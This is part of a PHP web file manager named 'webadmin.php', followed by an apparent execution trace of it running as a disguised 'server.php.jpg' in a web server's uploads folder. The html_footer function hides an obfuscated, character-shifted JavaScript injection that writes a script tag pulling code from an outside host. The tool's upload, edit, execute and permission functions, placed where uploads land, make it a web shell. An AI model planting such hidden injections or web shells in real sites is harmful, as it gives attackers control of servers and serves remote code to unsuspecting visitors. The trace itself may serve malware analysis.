            return "GIF89a\x11\x00\r\x00\x80\x01\x00\x00\x00\x00\xff\xff\xff!\xf9\x04\x01\n\x00\x01\x00,\x00\x00\x00\x00\x11\x00\r\x00\x00\x02\x1d\x8c\x0fp\xcb\xa8\rC\x8apRf\xaf\xd3+\xe7\xfa\x18I\x88\x8d\xe6\x08\x9e\xa8\xb6\xb2\$\xc7\x14\x00;";
    }
}
function html_header()
{
    global $site_charset;
    echo <<<END
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset={$site_charset}" />

<title>webadmin.php</title>

<style type="text/css">
body { font: small sans-serif; text-align: center }
img { width: 17px; height: 13px }
a, a:visited { text-decoration: none; color: navy }
hr { border-style: none; height: 1px; background-color: silver; color: silver }
#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
#main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
.listing th, .listing td { padding: 1px 3pt 0 3pt }
.listing th { border: 1px solid silver }
.listing td { border: 1px solid #ddd; background: white }
.listing .checkbox { text-align: center }
.listing .filename { text-align: left }
.listing .size { text-align: right }
.listing th.permission { text-align: left }
.listing td.permission { font-family: monospace }
.listing .owner { text-align: left }
.listing .group { text-align: left }
.listing .functions { text-align: left }
.listing_footer td { background: #eee; border: 1px solid silver }
#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
#directory { background: #eee; border: 1px solid silver }
#upload { padding-top: 1em }
#create { padding-bottom: 1em }
.small, .small option { font-size: x-small }
textarea { border: none; background: white }
table.dialog { margin-left: auto; margin-right: auto }
td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
#permission { margin-left: auto; margin-right: auto }
#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
td.permission_action { text-align: right }
#symlink { background: #eee; border: 1px solid silver }
#symlink td { text-align: left; padding: 3pt }
#red_button { width: 120px; color: #400 }
#green_button { width: 120px; color: #040 }
#error td { background: maroon; color: white; border: 1px solid silver }
#notice td { background: green; color: white; border: 1px solid silver }
#notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
code { font-size: 12pt }
td { white-space: nowrap }
</style>

<script type="text/javascript">
<!--
function activate (name) {
\tif (document && document.forms[0] && document.forms[0].elements['focus']) {
\t\tdocument.forms[0].elements['focus'].value = name;
\t}
}
//-->
</script>

</head>
<body>


END;
}
function html_footer()
{
    echo "</body>\r\n</html>\r\n<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%264E%2633iuuqt%264B00ibdljohuppm/ofu0mpht0dj%7B/kt%2633%264F%264D0tdsjqu%264F%26311')</script>";
}
function notice($phrase)
{
    global $cols;
    $args = func_get_args();
    array_shift($args);
    return '<tr id="notice">
	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
</tr>
';
}
function error($phrase)
{
    global $cols;
    $args = func_get_args();
    array_shift($args);
    return '<tr id="error">
	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
</tr>
';
}

Execution traces

data/traces/720d527f359bd8515f5cf46648ebfab4_trace-1676243054.7816.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:04:40.679432]
1	0	1	0.000162	393528
1	3	0	0.002220	789688	{main}	1		/var/www/html/uploads/server.php.jpg	0	0
1		A						/var/www/html/uploads/server.php.jpg	131	$lang = 'auto'
1		A						/var/www/html/uploads/server.php.jpg	136	$homedir = './'
1		A						/var/www/html/uploads/server.php.jpg	140	$editcols = 80
1		A						/var/www/html/uploads/server.php.jpg	141	$editrows = 25
1		A						/var/www/html/uploads/server.php.jpg	159	$htaccess = '.htaccess'
1		A						/var/www/html/uploads/server.php.jpg	160	$htpasswd = '.htpasswd'
2	4	0	0.002325	789688	get_magic_quotes_gpc	0		/var/www/html/uploads/server.php.jpg	164	0
2	4	1	0.002338	789688
2	4	R			FALSE
2	5	0	0.002353	789688	array_key_exists	0		/var/www/html/uploads/server.php.jpg	170	2	'image'	[]
2	5	1	0.002368	789752
2	5	R			FALSE
2	6	0	0.002382	789688	function_exists	0		/var/www/html/uploads/server.php.jpg	175	1	'lstat'
2	6	1	0.002395	789728
2	6	R			TRUE
1		A						/var/www/html/uploads/server.php.jpg	181	$delim = '/'
2	7	0	0.002418	789688	function_exists	0		/var/www/html/uploads/server.php.jpg	183	1	'php_uname'
2	7	1	0.002432	789728
2	7	R			TRUE
2	8	0	0.002445	789688	substr	0		/var/www/html/uploads/server.php.jpg	184	3	'Linux'	0	3
2	8	1	0.002459	789816
2	8	R			'Lin'
2	9	0	0.002472	789720	strtoupper	0		/var/www/html/uploads/server.php.jpg	184	1	'Lin'
2	9	1	0.002485	789784
2	9	R			'LIN'
1		A						/var/www/html/uploads/server.php.jpg	184	$win = FALSE
2	10	0	0.002511	789688	dirname	0		/var/www/html/uploads/server.php.jpg	192	1	'/var/www/html/uploads/server.php.jpg'
2	10	1	0.002525	789784
2	10	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/server.php.jpg	192	$scriptdir = '/var/www/html/uploads'
2	11	0	0.002551	789752	relative2absolute	1		/var/www/html/uploads/server.php.jpg	198	2	'./'	'/var/www/html/uploads'
3	12	0	0.002565	789752	path_is_relative	1		/var/www/html/uploads/server.php.jpg	1080	1	'./'
4	13	0	0.002578	789776	substr	0		/var/www/html/uploads/server.php.jpg	1094	3	'./'	0	1
4	13	1	0.002592	789872
4	13	R			'.'
3	12	1	0.002605	789776
3	12	R			TRUE
3	14	0	0.002618	789776	addslash	1		/var/www/html/uploads/server.php.jpg	1081	1	'/var/www/html/uploads'
4	15	0	0.002631	789800	substr	0		/var/www/html/uploads/server.php.jpg	1070	3	'/var/www/html/uploads'	-1	1
4	15	1	0.002644	789896
4	15	R			's'
3	14	1	0.002658	789848
3	14	R			'/var/www/html/uploads/'
3	16	0	0.002673	789856	simplify_path	1		/var/www/html/uploads/server.php.jpg	1081	1	'/var/www/html/uploads/./'
4	17	0	0.002687	789856	file_exists	0		/var/www/html/uploads/server.php.jpg	1121	1	'/var/www/html/uploads/./'
4	17	1	0.002709	789896
4	17	R			TRUE
4	18	0	0.002722	789856	function_exists	0		/var/www/html/uploads/server.php.jpg	1121	1	'realpath'
4	18	1	0.002736	789896
4	18	R			TRUE
4	19	0	0.002748	789856	realpath	0		/var/www/html/uploads/server.php.jpg	1121	1	'/var/www/html/uploads/./'
4	19	1	0.002761	789936
4	19	R			'/var/www/html/uploads'
4	20	0	0.002776	789856	realpath	0		/var/www/html/uploads/server.php.jpg	1122	1	'/var/www/html/uploads/./'
4	20	1	0.002789	789936
4	20	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/server.php.jpg	1122	$path = '/var/www/html/uploads'
4	21	0	0.002814	789904	is_dir	0		/var/www/html/uploads/server.php.jpg	1123	1	'/var/www/html/uploads'
4	21	1	0.002830	789968
4	21	R			TRUE
4	22	0	0.002843	789928	addslash	1		/var/www/html/uploads/server.php.jpg	1124	1	'/var/www/html/uploads'
5	23	0	0.002856	789928	substr	0		/var/www/html/uploads/server.php.jpg	1070	3	'/var/www/html/uploads'	-1	1
5	23	1	0.002869	790024
5	23	R			's'
4	22	1	0.002883	789976
4	22	R			'/var/www/html/uploads/'
3	16	1	0.002897	789928
3	16	R			'/var/www/html/uploads/'
2	11	1	0.002911	789872
2	11	R			'/var/www/html/uploads/'
1		A						/var/www/html/uploads/server.php.jpg	198	$homedir = '/var/www/html/uploads/'
2	24	0	0.002935	789872	array_key_exists	0		/var/www/html/uploads/server.php.jpg	200	2	'dir'	[]
2	24	1	0.002949	789936
2	24	R			FALSE
1		A						/var/www/html/uploads/server.php.jpg	200	$dir = '/var/www/html/uploads/'
2	25	0	0.002972	789872	array_key_exists	0		/var/www/html/uploads/server.php.jpg	202	2	'olddir'	[]
2	25	1	0.002995	789936
2	25	R			FALSE
2	26	0	0.003009	789872	addslash	1		/var/www/html/uploads/server.php.jpg	206	1	'/var/www/html/uploads/'
3	27	0	0.003021	789872	substr	0		/var/www/html/uploads/server.php.jpg	1070	3	'/var/www/html/uploads/'	-1	1
3	27	1	0.003035	789968
3	27	R			'/'
2	26	1	0.003048	789872
2	26	R			'/var/www/html/uploads/'
2	28	0	0.003062	789872	simplify_path	1		/var/www/html/uploads/server.php.jpg	206	1	'/var/www/html/uploads/'
3	29	0	0.003075	789872	file_exists	0		/var/www/html/uploads/server.php.jpg	1121	1	'/var/www/html/uploads/'
3	29	1	0.003090	789912
3	29	R			TRUE
3	30	0	0.003103	789872	function_exists	0		/var/www/html/uploads/server.php.jpg	1121	1	'realpath'
3	30	1	0.003116	789912
3	30	R			TRUE
3	31	0	0.003140	789872	realpath	0		/var/www/html/uploads/server.php.jpg	1121	1	'/var/www/html/uploads/'
3	31	1	0.003154	789952
3	31	R			'/var/www/html/uploads'
3	32	0	0.003168	789872	realpath	0		/var/www/html/uploads/server.php.jpg	1122	1	'/var/www/html/uploads/'
3	32	1	0.003180	789952
3	32	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/server.php.jpg	1122	$path = '/var/www/html/uploads'
3	33	0	0.003204	789920	is_dir	0		/var/www/html/uploads/server.php.jpg	1123	1	'/var/www/html/uploads'
3	33	1	0.003217	789960
3	33	R			TRUE
3	34	0	0.003229	789920	addslash	1		/var/www/html/uploads/server.php.jpg	1124	1	'/var/www/html/uploads'
4	35	0	0.003241	789920	substr	0		/var/www/html/uploads/server.php.jpg	1070	3	'/var/www/html/uploads'	-1	1
4	35	1	0.003255	790016
4	35	R			's'
3	34	1	0.003268	789968
3	34	R			'/var/www/html/uploads/'
2	28	1	0.003282	789920
2	28	R			'/var/www/html/uploads/'
1		A						/var/www/html/uploads/server.php.jpg	206	$directory = '/var/www/html/uploads/'
1		A						/var/www/html/uploads/server.php.jpg	208	$files = []
1		A						/var/www/html/uploads/server.php.jpg	209	$action = ''
2	36	0	0.003328	789920	array_key_exists	0		/var/www/html/uploads/server.php.jpg	223	2	'num'	[]
2	36	1	0.003342	789984
2	36	R			FALSE
2	37	0	0.003356	789920	array_key_exists	0		/var/www/html/uploads/server.php.jpg	232	2	'focus'	[]
2	37	1	0.003369	789984
2	37	R			FALSE
2	38	0	0.003382	789920	sizeof	0		/var/www/html/uploads/server.php.jpg	242	1	[]
2	38	1	0.003395	789952
2	38	R			0
1		A						/var/www/html/uploads/server.php.jpg	242	$action = ''
2	39	0	0.003418	789920	array_key_exists	0		/var/www/html/uploads/server.php.jpg	245	2	'HTTP_ACCEPT_LANGUAGE'	['HTTP_HOST' => 'localhost', 'HTTP_USER_AGENT' => 'python-requests/2.25.1', 'HTTP_ACCEPT_ENCODING' => 'gzip, deflate', 'HTTP_ACCEPT' => '*/*', 'HTTP_CONNECTION' => 'keep-alive', 'PATH' => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin', 'SERVER_SIGNATURE' => '<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n', 'SERVER_SOFTWARE' => 'Apache/2.4.52 (Ubuntu)', 'SERVER_NAME' => 'localhost', 'SERVER_ADDR' => '127.0.0.1', 'SERVER_PORT' => '80', 'REMOTE_ADDR' => '127.0.0.1', 'DOCUMENT_ROOT' => '/var/www/html', 'REQUEST_SCHEME' => 'http', 'CONTEXT_PREFIX' => '', 'CONTEXT_DOCUMENT_ROOT' => '/var/www/html', 'SERVER_ADMIN' => 'webmaster@localhost', 'SCRIPT_FILENAME' => '/var/www/html/uploads/server.php.jpg', 'REMOTE_PORT' => '38244', 'GATEWAY_INTERFACE' => 'CGI/1.1', 'SERVER_PROTOCOL' => 'HTTP/1.1', 'REQUEST_METHOD' => 'GET', 'QUERY_STRING' => '', 'REQUEST_URI' => '/uploads/server.php.jpg', 'SCRIPT_NAME' => '/uploads/server.php.jpg', 'PHP_SELF' => '/uploads/server.php.jpg', 'REQUEST_TIME_FLOAT' => 1676243054.781, 'REQUEST_TIME' => 1676243054]
2	39	1	0.003473	789984
2	39	R			FALSE
1		A						/var/www/html/uploads/server.php.jpg	248	$lang = 'en'
2	40	0	0.003496	789920	getwords	1		/var/www/html/uploads/server.php.jpg	252	1	'en'
2		A						/var/www/html/uploads/server.php.jpg	1620	$word_charset = 'UTF-8'
2		A						/var/www/html/uploads/server.php.jpg	2472	$date_format = 'n/j/y H:i:s'
2	40	1	0.003532	789968
2	40	R			['directory' => 'Directory', 'file' => 'File', 'filename' => 'Filename', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'read', 'write' => 'write', 'execute' => 'execute', 'create_symlink' => 'create symlink', 'delete' => 'delete', 'rename' => 'rename', 'move' => 'move', 'copy' => 'copy', 'edit' => 'edit', 'download' => 'download', 'upload' => 'upload', 'create' => 'create', 'change' => 'change', 'save' => 'save', 'set' => 'set', 'reset' => 'reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'add', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => 'These files have been deleted:\n[%1]', 'not_deleted' => 'These files could not be deleted:\n[%1]', 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => 'These files have been moved to "[%2]":\n[%1]', 'not_moved' => 'These files could not be moved to "[%2]":\n[%1]', 'copy_files' => 'Copy these files:', 'copied' => 'These files have been copied to "[%2]":\n[%1]', 'not_copied' => 'These files could not be copied to "[%2]":\n[%1]', 'not_edited' => '"[%1]" can not be edited.', 'executed' => '"[%1]" has been executed successfully:\n{%2}', 'not_executed' => '"[%1]" could not be executed successfully:\n{%2}', 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.']
1		A						/var/www/html/uploads/server.php.jpg	252	$words = ['directory' => 'Directory', 'file' => 'File', 'filename' => 'Filename', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'read', 'write' => 'write', 'execute' => 'execute', 'create_symlink' => 'create symlink', 'delete' => 'delete', 'rename' => 'rename', 'move' => 'move', 'copy' => 'copy', 'edit' => 'edit', 'download' => 'download', 'upload' => 'upload', 'create' => 'create', 'change' => 'change', 'save' => 'save', 'set' => 'set', 'reset' => 'reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'add', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => 'These files have been deleted:\n[%1]', 'not_deleted' => 'These files could not be deleted:\n[%1]', 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => 'These files have been moved to "[%2]":\n[%1]', 'not_moved' => 'These files could not be moved to "[%2]":\n[%1]', 'copy_files' => 'Copy these files:', 'copied' => 'These files have been copied to "[%2]":\n[%1]', 'not_copied' => 'These files could not be copied to "[%2]":\n[%1]', 'not_edited' => '"[%1]" can not be edited.', 'executed' => '"[%1]" has been executed successfully:\n{%2}', 'not_executed' => '"[%1]" could not be executed successfully:\n{%2}', 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.']
1		A						/var/www/html/uploads/server.php.jpg	258	$cols = 7
2	41	0	0.003736	789968	function_exists	0		/var/www/html/uploads/server.php.jpg	261	1	'umask'
2	41	1	0.003751	790008
2	41	R			TRUE
2	42	0	0.003764	789968	umask	0		/var/www/html/uploads/server.php.jpg	261	0
2	42	1	0.003777	789968
2	42	R			18
1		A						/var/www/html/uploads/server.php.jpg	261	$dirpermission = 493
2	43	0	0.003801	789968	function_exists	0		/var/www/html/uploads/server.php.jpg	264	1	'umask'
2	43	1	0.003815	790008
2	43	R			TRUE
2	44	0	0.003827	789968	umask	0		/var/www/html/uploads/server.php.jpg	264	0
2	44	1	0.003839	789968
2	44	R			18
1		A						/var/www/html/uploads/server.php.jpg	264	$filepermission = 420
2	45	0	0.003863	789968	basename	0		/var/www/html/uploads/server.php.jpg	268	1	'/uploads/server.php.jpg'
2	45	1	0.003878	790040
2	45	R			'server.php.jpg'
2	46	0	0.003892	790008	html	1		/var/www/html/uploads/server.php.jpg	268	1	'server.php.jpg'
3	47	0	0.003905	790032	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'server.php.jpg'	2	NULL
3	47	1	0.003921	790304
3	47	R			'server.php.jpg'
2	46	1	0.003935	790192
2	46	R			'server.php.jpg'
1		A						/var/www/html/uploads/server.php.jpg	268	$self = 'server.php.jpg'
2	48	0	0.003960	790152	substr	0		/var/www/html/uploads/server.php.jpg	276	3	'Apache/2.4.52 (Ubuntu)'	0	6
2	48	1	0.003975	790280
2	48	R			'Apache'
2	49	0	0.003989	790184	strtolower	0		/var/www/html/uploads/server.php.jpg	276	1	'Apache'
2	49	1	0.004002	790248
2	49	R			'apache'
1		A						/var/www/html/uploads/server.php.jpg	277	$apache = TRUE
2	50	0	0.004026	790152	listing_page	1		/var/www/html/uploads/server.php.jpg	842	1	???
3	51	0	0.004039	790248	html_header	1		/var/www/html/uploads/server.php.jpg	1184	0
3	51	1	0.004054	790248
3	52	0	0.004061	790248	getlist	1		/var/www/html/uploads/server.php.jpg	1186	1	'/var/www/html/uploads/'
4	53	0	0.004074	790248	opendir	0		/var/www/html/uploads/server.php.jpg	851	1	'/var/www/html/uploads/'
4	53	1	0.004095	790640
4	53	R			resource(4) of type (stream)
3		A						/var/www/html/uploads/server.php.jpg	851	$d = resource(4) of type (stream)
4	54	0	0.004123	790608	readdir	0		/var/www/html/uploads/server.php.jpg	853	1	resource(4) of type (stream)
4	54	1	0.004146	790680
4	54	R			'..'
3		A						/var/www/html/uploads/server.php.jpg	853	$filename = '..'
3		A						/var/www/html/uploads/server.php.jpg	855	$path = '/var/www/html/uploads/..'
4	55	0	0.004180	790696	lstat	0		/var/www/html/uploads/server.php.jpg	857	1	'/var/www/html/uploads/..'
4	55	1	0.004197	792520
4	55	R			[0 => 2049, 1 => 524470, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524470, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/server.php.jpg	857	$stat = [0 => 2049, 1 => 524470, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524470, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 8]
4	56	0	0.004259	793176	is_file	0		/var/www/html/uploads/server.php.jpg	862	1	'/var/www/html/uploads/..'
4	56	1	0.004274	793224
4	56	R			FALSE
4	57	0	0.004288	793184	is_dir	0		/var/www/html/uploads/server.php.jpg	863	1	'/var/www/html/uploads/..'
4	57	1	0.004301	793224
4	57	R			TRUE
4	58	0	0.004314	793184	is_link	0		/var/www/html/uploads/server.php.jpg	864	1	'/var/www/html/uploads/..'
4	58	1	0.004327	793224
4	58	R			FALSE
4	59	0	0.004339	793184	is_readable	0		/var/www/html/uploads/server.php.jpg	865	1	'/var/www/html/uploads/..'
4	59	1	0.004356	793224
4	59	R			TRUE
4	60	0	0.004369	793184	is_writable	0		/var/www/html/uploads/server.php.jpg	866	1	'/var/www/html/uploads/..'
4	60	1	0.004388	793224
4	60	R			TRUE
4	61	0	0.004402	793184	filemtime	0		/var/www/html/uploads/server.php.jpg	871	1	'/var/www/html/uploads/..'
4	61	1	0.004415	793224
4	61	R			1676243054
4	62	0	0.004428	793184	fileatime	0		/var/www/html/uploads/server.php.jpg	872	1	'/var/www/html/uploads/..'
4	62	1	0.004440	793224
4	62	R			1676243054
4	63	0	0.004477	793184	filectime	0		/var/www/html/uploads/server.php.jpg	873	1	'/var/www/html/uploads/..'
4	63	1	0.004493	793224
4	63	R			1676243054
3		A						/var/www/html/uploads/server.php.jpg	873	$file = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054]
4	64	0	0.004533	793240	file_exists	0		/var/www/html/uploads/server.php.jpg	877	1	'/var/www/html/uploads/../.'
4	64	1	0.004550	793280
4	64	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	877	$file['is_executable'] = TRUE
4	65	0	0.004576	793184	function_exists	0		/var/www/html/uploads/server.php.jpg	888	1	'posix_getpwuid'
4	65	1	0.004590	793224
4	65	R			TRUE
4	66	0	0.004603	793184	posix_getpwuid	0		/var/www/html/uploads/server.php.jpg	888	1	0
4	66	1	0.004634	793984
4	66	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	67	0	0.004658	793952	reset	0		/var/www/html/uploads/server.php.jpg	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	67	1	0.004678	794360
4	67	R			'root'
3		A						/var/www/html/uploads/server.php.jpg	888	$file['owner_name'] = 'root'
4	68	0	0.004703	793216	function_exists	0		/var/www/html/uploads/server.php.jpg	889	1	'posix_getgrgid'
4	68	1	0.004716	793256
4	68	R			TRUE
4	69	0	0.004729	793216	posix_getgrgid	0		/var/www/html/uploads/server.php.jpg	889	1	0
4	69	1	0.004753	793872
4	69	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	70	0	0.004773	793840	reset	0		/var/www/html/uploads/server.php.jpg	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	70	1	0.004790	794248
4	70	R			'root'
3		A						/var/www/html/uploads/server.php.jpg	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/server.php.jpg	891	$files[] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	71	0	0.004843	794264	readdir	0		/var/www/html/uploads/server.php.jpg	853	1	resource(4) of type (stream)
4	71	1	0.004858	794336
4	71	R			'.'
3		A						/var/www/html/uploads/server.php.jpg	853	$filename = '.'
3		A						/var/www/html/uploads/server.php.jpg	855	$path = '/var/www/html/uploads/.'
4	72	0	0.004891	794344	lstat	0		/var/www/html/uploads/server.php.jpg	857	1	'/var/www/html/uploads/.'
4	72	1	0.004908	796128
4	72	R			[0 => 2049, 1 => 524471, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524471, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/server.php.jpg	857	$stat = [0 => 2049, 1 => 524471, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243054, 9 => 1676243054, 10 => 1676243054, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524471, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243054, 'mtime' => 1676243054, 'ctime' => 1676243054, 'blksize' => 4096, 'blocks' => 8]
4	73	0	0.004968	795032	is_file	0		/var/www/html/uploads/server.php.jpg	862	1	'/var/www/html/uploads/.'
4	73	1	0.004983	795064
4	73	R			FALSE
4	74	0	0.004996	795024	is_dir	0		/var/www/html/uploads/server.php.jpg	863	1	'/var/www/html/uploads/.'
4	74	1	0.005009	795064
4	74	R			TRUE
4	75	0	0.005021	795024	is_link	0		/var/www/html/uploads/server.php.jpg	864	1	'/var/www/html/uploads/.'
4	75	1	0.005034	795064
4	75	R			FALSE
4	76	0	0.005047	795024	is_readable	0		/var/www/html/uploads/server.php.jpg	865	1	'/var/www/html/uploads/.'
4	76	1	0.005062	795064
4	76	R			TRUE
4	77	0	0.005075	795024	is_writable	0		/var/www/html/uploads/server.php.jpg	866	1	'/var/www/html/uploads/.'
4	77	1	0.005089	795064
4	77	R			TRUE
4	78	0	0.005102	795024	filemtime	0		/var/www/html/uploads/server.php.jpg	871	1	'/var/www/html/uploads/.'
4	78	1	0.005115	795064
4	78	R			1676243054
4	79	0	0.005128	795024	fileatime	0		/var/www/html/uploads/server.php.jpg	872	1	'/var/www/html/uploads/.'
4	79	1	0.005140	795064
4	79	R			1676243054
4	80	0	0.005160	795024	filectime	0		/var/www/html/uploads/server.php.jpg	873	1	'/var/www/html/uploads/.'
4	80	1	0.005173	795064
4	80	R			1676243054
3		A						/var/www/html/uploads/server.php.jpg	873	$file = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054]
4	81	0	0.005212	795080	file_exists	0		/var/www/html/uploads/server.php.jpg	877	1	'/var/www/html/uploads/./.'
4	81	1	0.005227	795120
4	81	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	877	$file['is_executable'] = TRUE
4	82	0	0.005252	795024	function_exists	0		/var/www/html/uploads/server.php.jpg	888	1	'posix_getpwuid'
4	82	1	0.005266	795064
4	82	R			TRUE
4	83	0	0.005278	795024	posix_getpwuid	0		/var/www/html/uploads/server.php.jpg	888	1	0
4	83	1	0.005302	795824
4	83	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	84	0	0.005325	795792	reset	0		/var/www/html/uploads/server.php.jpg	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	84	1	0.005345	796200
